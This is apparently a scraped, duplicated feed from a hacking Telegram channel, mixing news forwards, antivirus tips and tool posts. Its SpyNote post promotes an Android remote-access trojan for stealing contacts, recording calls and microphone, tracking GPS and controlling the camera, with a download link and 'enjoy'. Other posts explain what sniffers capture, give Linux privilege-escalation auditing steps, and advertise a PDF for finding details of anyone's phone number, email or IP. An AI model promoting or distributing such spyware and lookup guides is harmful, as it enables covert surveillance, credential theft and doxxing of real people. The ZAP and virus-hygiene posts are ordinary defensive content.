β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦What can SpyNote do?
SpyNote is actually a tool used to create Android malicious programs. Recently, it has been particularly popular in many malicious program forums. It has some quite attractive features:
Β· No need to obtain system root permissions;
Β· Monitor the call;
Β· Steal contacts and information data;
Β· Record sound through microphone;
Β· Malicious calls;
Β· Install malicious applications;
Β· Obtain the IMEI code, WiFi MAC address, and wireless network operator details of the mobile phone;
Β· Get ββthe latest GPS location information of the device;
Β· Control the camera
π¦DOWNLOAD APK https://github.com/cymilad/SpyNote
enjoyβ€οΈππ»
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦What can SpyNote do?
SpyNote is actually a tool used to create Android malicious programs. Recently, it has been particularly popular in many malicious program forums. It has some quite attractive features:
Β· No need to obtain system root permissions;
Β· Monitor the call;
Β· Steal contacts and information data;
Β· Record sound through microphone;
Β· Malicious calls;
Β· Install malicious applications;
Β· Obtain the IMEI code, WiFi MAC address, and wireless network operator details of the mobile phone;
Β· Get ββthe latest GPS location information of the device;
Β· Control the camera
π¦DOWNLOAD APK https://github.com/cymilad/SpyNote
enjoyβ€οΈππ»
@UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - cymilad/SpyNote: RAT Android
RAT Android. Contribute to cymilad/SpyNote development by creating an account on GitHub.
Forwarded from UNDERCODE NEWS
The EU may delay the tech giant 's inquiry into data misuse in the Twitter case #international
Forwarded from UNDERCODE NEWS
Google introduced security measures seven hours after it revealed weakness in Gmail
Forwarded from UNDERCODE NEWS
campus tv hackedο½The school campus TV station issued a statement saying that the youtube account was hacked
#cyberAttacks
#cyberAttacks
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Steps to crack BAT batch source code in pseudo EXE:
1) First of all, double-click the program to run, do not close, some programs will KillSelf when they are closed;
2) Secondly, cd %temp% under CMD. At the beginning, I used dir *.bat and did not find it. At this time, you have to think that it may be a .cmd file, so you can try dir *.cmd, but there is no result;
3) γγFinally, copy the found BAT and right-click "Edit" to see the source code. The source code is as follows:
@echo off
title [One-key clearing of print tasks] BY: wnsdt
color 2f
echo.&echo.&echo.
echo Description (2011.10.11):
echo.&echo.
echo This tool can quickly clear unresponsive printing tasks and solve problems that cannot be printed problem!
echo.
echo If you connect to a printer shared on the network, please run this tool on that computer!
echo.&echo.
echo --------------------------------------------- -------------------
echo.
Echo leave a message on Weibo if there is a problem <a href="http://t.qq.com/wnsdt_kk">http:// t.qq.com/wnsdt_kk</a>
echo.&echo.&echo.&echo.&echo.&echo.
echo Press any key to start, exit, please close
pause>nul 2>nul
cls
echo.&echo.&echo.&echo.&echo. &echo.
echo will be cleaned up later, please print again...
net stop spooler>nul 2>nul
del %systemroot%\System32\spool\PRINTERS\*.* /q /s /f>nul 2>nul
sc config spooler start= auto>nul 2>nul
net start spooler>nul 2 >nul
exit
Written @UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Steps to crack BAT batch source code in pseudo EXE:
1) First of all, double-click the program to run, do not close, some programs will KillSelf when they are closed;
2) Secondly, cd %temp% under CMD. At the beginning, I used dir *.bat and did not find it. At this time, you have to think that it may be a .cmd file, so you can try dir *.cmd, but there is no result;
3) γγFinally, copy the found BAT and right-click "Edit" to see the source code. The source code is as follows:
@echo off
title [One-key clearing of print tasks] BY: wnsdt
color 2f
echo.&echo.&echo.
echo Description (2011.10.11):
echo.&echo.
echo This tool can quickly clear unresponsive printing tasks and solve problems that cannot be printed problem!
echo.
echo If you connect to a printer shared on the network, please run this tool on that computer!
echo.&echo.
echo --------------------------------------------- -------------------
echo.
Echo leave a message on Weibo if there is a problem <a href="http://t.qq.com/wnsdt_kk">http:// t.qq.com/wnsdt_kk</a>
echo.&echo.&echo.&echo.&echo.&echo.
echo Press any key to start, exit, please close
pause>nul 2>nul
cls
echo.&echo.&echo.&echo.&echo. &echo.
echo will be cleaned up later, please print again...
net stop spooler>nul 2>nul
del %systemroot%\System32\spool\PRINTERS\*.* /q /s /f>nul 2>nul
sc config spooler start= auto>nul 2>nul
net start spooler>nul 2 >nul
exit
Written @UndercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦#fastTips full webHacking via windows :
The OWASP Zed Attack Proxy (ZAP) is one of the worldβs most popular free security tools and is actively maintained by a dedicated international team of volunteers. It can help you automatically find security vulnerabilities in your web applications while you are developing and testing your applications. It's also a great tool for experienced pentesters to use for manual security testing.
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½:
1) download https://www.zaproxy.org/download/
2) run the setup
3) use for learn
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦#fastTips full webHacking via windows :
The OWASP Zed Attack Proxy (ZAP) is one of the worldβs most popular free security tools and is actively maintained by a dedicated international team of volunteers. It can help you automatically find security vulnerabilities in your web applications while you are developing and testing your applications. It's also a great tool for experienced pentesters to use for manual security testing.
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½:
1) download https://www.zaproxy.org/download/
2) run the setup
3) use for learn
β β β Uππ»βΊπ«Δπ¬πβ β β β
www.zaproxy.org
ZAP β Download
The worldβs most widely used web app scanner. Free and open source. ZAP is a community project actively maintained by a dedicated international team, and a GitHub Top 1000 project.
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Eight basic principles to stay away from viruses:
1. Establish good security habits. For example: Do not open some emails and attachments of unknown origin, do not go to some unknown websites, do not execute software that is downloaded from the Internet without anti-virus treatment, etc. These necessary habits will make you The computer is more secure.
2. Turn off or delete unnecessary services in the system . By default, many operating systems will install some auxiliary services, such as FTP client, Telnet, and Web server. These services provide convenience for attackers, but are not of much use to users. If they are deleted, the possibility of being attacked can be greatly reduced.
3. Update security patches frequently. According to statistics, 80% of network viruses spread through system security vulnerabilities , such as Worm King, Shockwave, Sasser, etc., so we should regularly download the latest security patches from the Microsoft website to prevent Before it happens. γγ
4. Using complex passwords Many network viruses attack the system by guessing simple passwords. Therefore, using complex passwords will greatly improve the security of the computer.
5. Quickly isolate the infected computer. When your computer finds a virus or abnormality, you should disconnect it immediately to prevent the computer from being infected more or becoming a source of transmission and infecting other computers again.
6. Know some virus knowledge so that you can discover new viruses in time and take corresponding measures to protect your computer from virus damage at critical moments. If you can understand some registry knowledge, you can regularly check whether there are suspicious keys in the registry's self-starting items; if you understand some memory knowledge, you can often check whether there are suspicious programs in the memory.
7. It is best to install professional anti-virus software for comprehensive monitoring. With the increasing number of viruses today, using anti-virus software for anti-virus is an increasingly economical choice. However, after installing anti-virus software, users should frequently upgrade and change some The main monitoring is often opened (such as mail monitoring), memory monitoring, etc., and problems should be reported, so as to truly protect the security of the computer.
8. Users should also install personal firewall software to prevent hacking. Due to the development of the Internet, hacker attacks on usersβ computers are becoming more and more serious. Many network viruses use hackers to attack usersβ computers. Therefore, users should also install Personal firewall software, set the security level to medium or high, so as to effectively prevent hacker attacks on the network.
@undercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Eight basic principles to stay away from viruses:
1. Establish good security habits. For example: Do not open some emails and attachments of unknown origin, do not go to some unknown websites, do not execute software that is downloaded from the Internet without anti-virus treatment, etc. These necessary habits will make you The computer is more secure.
2. Turn off or delete unnecessary services in the system . By default, many operating systems will install some auxiliary services, such as FTP client, Telnet, and Web server. These services provide convenience for attackers, but are not of much use to users. If they are deleted, the possibility of being attacked can be greatly reduced.
3. Update security patches frequently. According to statistics, 80% of network viruses spread through system security vulnerabilities , such as Worm King, Shockwave, Sasser, etc., so we should regularly download the latest security patches from the Microsoft website to prevent Before it happens. γγ
4. Using complex passwords Many network viruses attack the system by guessing simple passwords. Therefore, using complex passwords will greatly improve the security of the computer.
5. Quickly isolate the infected computer. When your computer finds a virus or abnormality, you should disconnect it immediately to prevent the computer from being infected more or becoming a source of transmission and infecting other computers again.
6. Know some virus knowledge so that you can discover new viruses in time and take corresponding measures to protect your computer from virus damage at critical moments. If you can understand some registry knowledge, you can regularly check whether there are suspicious keys in the registry's self-starting items; if you understand some memory knowledge, you can often check whether there are suspicious programs in the memory.
7. It is best to install professional anti-virus software for comprehensive monitoring. With the increasing number of viruses today, using anti-virus software for anti-virus is an increasingly economical choice. However, after installing anti-virus software, users should frequently upgrade and change some The main monitoring is often opened (such as mail monitoring), memory monitoring, etc., and problems should be reported, so as to truly protect the security of the computer.
8. Users should also install personal firewall software to prevent hacking. Due to the development of the Internet, hacker attacks on usersβ computers are becoming more and more serious. Many network viruses use hackers to attack usersβ computers. Therefore, users should also install Personal firewall software, set the security level to medium or high, so as to effectively prevent hacker attacks on the network.
@undercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Usually the content that sniffer cares about can be divided into the following categories:
1. Password
I think this is the reason for the vast majority of illegal use of sniffer, sniffer can record the userid and passwd transmitted in plain text. Even if you use encryption during network transmission Data, like the data recorded by sniffer, may make the intruder try to figure out your algorithm while eating skewers at home.
2. Financial account
Many users are at ease using their credit card or cash account on the Internet, but sniffers can easily intercept the user name, password, credit card number, expiration date, account number, and pin sent online.
3. Peeping confidential or sensitive information and data
through interception Data packets, intruders can easily record the transfer of sensitive information between others, or simply intercept the entire email conversation process.
4. Spy on low-level protocol information.
This is a terrible thing, I think, by recording the underlying information protocol, such as recording the network interface address between two hosts, the remote network interface ip address, ip routing information, and the byte order number of the tcp connection.
> This information will pose a great harm to network security after being held by an illegal intruder. Usually someone uses sniffers to collect this information for only one reason: he is conducting a fraud, (usually ip address fraud requires you to accurately insert the tcp connection Byte order number, which will be pointed out in a future article) If someone is very concerned about this issue, then the sniffer is just a prelude to him, and the future problems will be much bigger.
@undercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Usually the content that sniffer cares about can be divided into the following categories:
1. Password
I think this is the reason for the vast majority of illegal use of sniffer, sniffer can record the userid and passwd transmitted in plain text. Even if you use encryption during network transmission Data, like the data recorded by sniffer, may make the intruder try to figure out your algorithm while eating skewers at home.
2. Financial account
Many users are at ease using their credit card or cash account on the Internet, but sniffers can easily intercept the user name, password, credit card number, expiration date, account number, and pin sent online.
3. Peeping confidential or sensitive information and data
through interception Data packets, intruders can easily record the transfer of sensitive information between others, or simply intercept the entire email conversation process.
4. Spy on low-level protocol information.
This is a terrible thing, I think, by recording the underlying information protocol, such as recording the network interface address between two hosts, the remote network interface ip address, ip routing information, and the byte order number of the tcp connection.
> This information will pose a great harm to network security after being held by an illegal intruder. Usually someone uses sniffers to collect this information for only one reason: he is conducting a fraud, (usually ip address fraud requires you to accurately insert the tcp connection Byte order number, which will be pointed out in a future article) If someone is very concerned about this issue, then the sniffer is just a prelude to him, and the future problems will be much bigger.
@undercodeTesting
β β β Uππ»βΊπ«Δπ¬πβ β β β
5 h vote, Suggest us / you want in next posts :
Anonymous Poll
35%
More exploits guides ?
13%
More related to sniffing attacks ?
16%
Updates for termux/linux tools ?
19%
Some tips for beginers ?
17%
Others(courses/pdfs..)
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦LES: Linux privilege escalation auditing tool:
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1)DOWNLOAD :
wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O les.sh
> Details about LES usage and inner workings:
https://mzet-.github.io/2019/05/10/les-paper.html
Additional resources for the LES:
https://github.com/mzet-/les-res
2) cd dir
3) $ ./linux-exploit-suggester.sh
4) For each exploit, exposure is calculated. Following 'Exposure' states are possible:
1οΈβ£Highly probable - assessed kernel is most probably affected and there's a very good chance that PoC exploit will work out of the box without any major modifications.
2οΈβ£Probable - it's possible that exploit will work but most likely customization of PoC exploit will be needed to suit your target.
3οΈβ£Less probable - additional manual analysis is needed to verify if kernel is affected.
4οΈβ£Unprobable - highly unlikely that kernel is affected (exploit is not displayed in the tool's output)
5) Verifying state of kernel hardening security measures
LES can check for most of security settings available by your Linux kernel. It verifies not only the kernel compile-time configurations (CONFIGs) but also verifies run-time settings (sysctl) giving more complete picture of security posture for running kernel. This functionality is modern continuation of --kernel switch from checksec.sh tool by Tobias Klein. Example of tool output:
$ ./linux-exploit-suggester.sh --checksec
6) Assess exposure of the Linux box on publicly known exploits:
$ ./linux-exploit-suggester.sh
Show state of security features on the Linux box:
$ ./linux-exploit-suggester.sh --checksec
Assess exposure of Linux kernel on publicly known exploits based on the provided 'uname' string (i.e. output of uname -a command):
$ ./linux-exploit-suggester.sh --uname <uname-string>
USE FOR LEARN !!!
verified @UndercodeTesting
β git topic
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦LES: Linux privilege escalation auditing tool:
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1)DOWNLOAD :
wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O les.sh
> Details about LES usage and inner workings:
https://mzet-.github.io/2019/05/10/les-paper.html
Additional resources for the LES:
https://github.com/mzet-/les-res
2) cd dir
3) $ ./linux-exploit-suggester.sh
4) For each exploit, exposure is calculated. Following 'Exposure' states are possible:
1οΈβ£Highly probable - assessed kernel is most probably affected and there's a very good chance that PoC exploit will work out of the box without any major modifications.
2οΈβ£Probable - it's possible that exploit will work but most likely customization of PoC exploit will be needed to suit your target.
3οΈβ£Less probable - additional manual analysis is needed to verify if kernel is affected.
4οΈβ£Unprobable - highly unlikely that kernel is affected (exploit is not displayed in the tool's output)
5) Verifying state of kernel hardening security measures
LES can check for most of security settings available by your Linux kernel. It verifies not only the kernel compile-time configurations (CONFIGs) but also verifies run-time settings (sysctl) giving more complete picture of security posture for running kernel. This functionality is modern continuation of --kernel switch from checksec.sh tool by Tobias Klein. Example of tool output:
$ ./linux-exploit-suggester.sh --checksec
6) Assess exposure of the Linux box on publicly known exploits:
$ ./linux-exploit-suggester.sh
Show state of security features on the Linux box:
$ ./linux-exploit-suggester.sh --checksec
Assess exposure of Linux kernel on publicly known exploits based on the provided 'uname' string (i.e. output of uname -a command):
$ ./linux-exploit-suggester.sh --uname <uname-string>
USE FOR LEARN !!!
verified @UndercodeTesting
β git topic
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - mzet-/les-res: Additional resources and references for linux-exploit-suggester.sh
Additional resources and references for linux-exploit-suggester.sh - mzet-/les-res
Find_Details_Of_any_Mobile_Number,_Email_ID,_IP_Address_in_the_world.pdf
2.5 MB
Find Details Of any Mobile Number, Email ID, IP Address in the world (Step By Step) #Highrequested
Forwarded from UNDERCODE NEWS
The world's largest ATM makers, Diebold Nixdorf and NCR, have released software updates for their devices.
#Vulnerabilities
#Vulnerabilities